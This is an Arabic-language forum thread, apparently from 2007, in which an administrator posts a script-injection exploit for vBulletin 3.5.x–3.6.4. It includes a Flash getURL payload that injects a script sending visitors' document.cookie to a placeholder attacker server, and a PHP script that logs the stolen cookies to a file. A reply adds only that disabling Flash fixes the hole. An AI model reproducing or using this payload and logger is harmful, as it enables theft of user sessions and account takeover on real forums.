العودة   شبكة آرا ويب التطويرية > المنتديات > حماية المواقع و سد ثغرات المنتديات


ثغرة من نوع VBScript Injection في منتديات vb

حماية مواقع ، حماية منتدى ، سد ثغرات ، حماية ، ثغرات ، ترقيع


إضافة رد
 
LinkBack أدوات الموضوع طريقة عرض الموضوع
قديم 18-May-2007, 06:16 PM   #1 (permalink)
مدير عام
 
تاريخ التسجيل: May 2007
المشاركات: 614
افتراضي ثغرة من نوع VBScript Injection في منتديات vb

VBulletin SWF Script Injection Vulnerability

الاصدارات المصابة :
VBulletin VBulletin 3.6.4
VBulletin VBulletin 3.6.3
VBulletin VBulletin 3.6.2
VBulletin VBulletin 3.6.1
VBulletin VBulletin 3.6
VBulletin VBulletin 3.5.4
VBulletin VBulletin 3.5.3
VBulletin VBulletin 3.5.2
VBulletin VBulletin 3.5.1



الثغرة :
كود PHP:
getURL("javascript:function blab(){}var scriptNode = 
+document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie
+;blab();"
); 
كود ملف UrPHPpage.php :
كود PHP:
<?
$fp 
fopen("Mylog.txt","a");
if(
$_GET['Cookie'])
{
$str="
"
.date("Y-m-d h:i:s")."^".$_GET['Cookie'];
fwrite($fp,$str); 
}
fclose($fp);
?>
ارجو عدم استخدامها في الضرر

تحياتي
ابو عمار
__________________
منتديات شبكة آرا ويب لخدمات الانترنت
http://www.arawebserv.com/vb


لطلبات الاشراف والمتابعة
admin@arawebserv.com
araweb غير متواجد حالياً   رد مع اقتباس
Sponsored Links
قديم 28-Jan-2008, 09:20 PM   #2 (permalink)
عضو جديد
 
تاريخ التسجيل: Jan 2008
المشاركات: 1
افتراضي

مشكور اخووي بس حبيت أستفسر عن كيفية أستغلال مثل هذه الثغرات وكيفية ترقيعها
العبدلي غير متواجد حالياً   رد مع اقتباس
قديم 29-Jan-2008, 12:43 PM   #3 (permalink)
مدير عام
 
تاريخ التسجيل: May 2007
المشاركات: 614
افتراضي

كيفة الاستثمار اخوي سهله بس جدا

ولو شرحناها مانضمن الناس الي تعرف الشرح

وترقيعها قفل الفلاش نهائياً

تحية طيبة لك اخوي العبدلي
__________________
منتديات شبكة آرا ويب لخدمات الانترنت
http://www.arawebserv.com/vb


لطلبات الاشراف والمتابعة
admin@arawebserv.com
araweb غير متواجد حالياً   رد مع اقتباس
إضافة رد

أدوات الموضوع
طريقة عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة


المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر رد
شركة تصميم منتديات رخيصه جد جد عبودي عروض البيع والشراء 0 17-Mar-2008 03:58 PM
ثغرة مجربة على 3.6.5 و 3.6.4 "جديدة" من نوع sql injection araweb حماية المواقع و سد ثغرات المنتديات 1 19-May-2007 02:06 PM
ثغرة في نسخة 3.6.5 من نوع Sql Injection في ملف misc.php araweb حماية المواقع و سد ثغرات المنتديات 0 18-May-2007 05:25 PM




الساعة الآن 06:07 AM.

أقسام المنتديات

الاقسام العامة * البرامج الكاملة والنادرة Programs * معرض التصاميم وبرامج التصميم * المنتديات * تطوير المنتديات * استايلات النسخة الثالثة * تطوير المواقع * الاقسام الادارية * الشكاوي والملاحظات والطلبات * قسم المشرفين * عروض البيع والشراء * التقنيه و الأمن و الحماية * لغات برمجة المواقع * صيانة و دعم فني منتديات و حل مشاكل المواقع * المواقع و السيرفرات * مكتبة هاكات الجيل الثالث * حماية المواقع و سد ثغرات المنتديات * السيرفرات * ** منتدى الدورات المجانية الخاصة ** * الكمبيوتر و الأنترنت و الجوال * برامج الجوال Mobile Software * قسم ألعاب Mobile Games & خلفيات , ثيمات & Mobile Graphics * قسم الرسائل والمسجات Mobile SMS ورسائل MMS * صيانة الحاسوب Computer Maintenance * ألعاب الكمبيوتر PC Games * وظائف و توظيف (طلب وظيفة - طلب موظفين) * ارشفة المواقع و صداقة محركات البحث سيو SEO * جوجل ادسنس Google Adsense * منتديات الجيل الرابع 4.0.0 * الواجهات والقوالب والتصاميم الجاهزه * السكربتات والاكواد و برامج ادارة المحتوى * استايلات النسخة الرابعه * مكتبة هاكات الجيل الرابع *



Powered by vBulletin Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
devloped - by m4arabs : Search Engine Friendly URLs by vBSEO 3.3.0

Protected by ArSup.Net

  جميع الحقوق محفوظة لمنتديات شبكة آرا ويب لخدمات الانترنت © 2007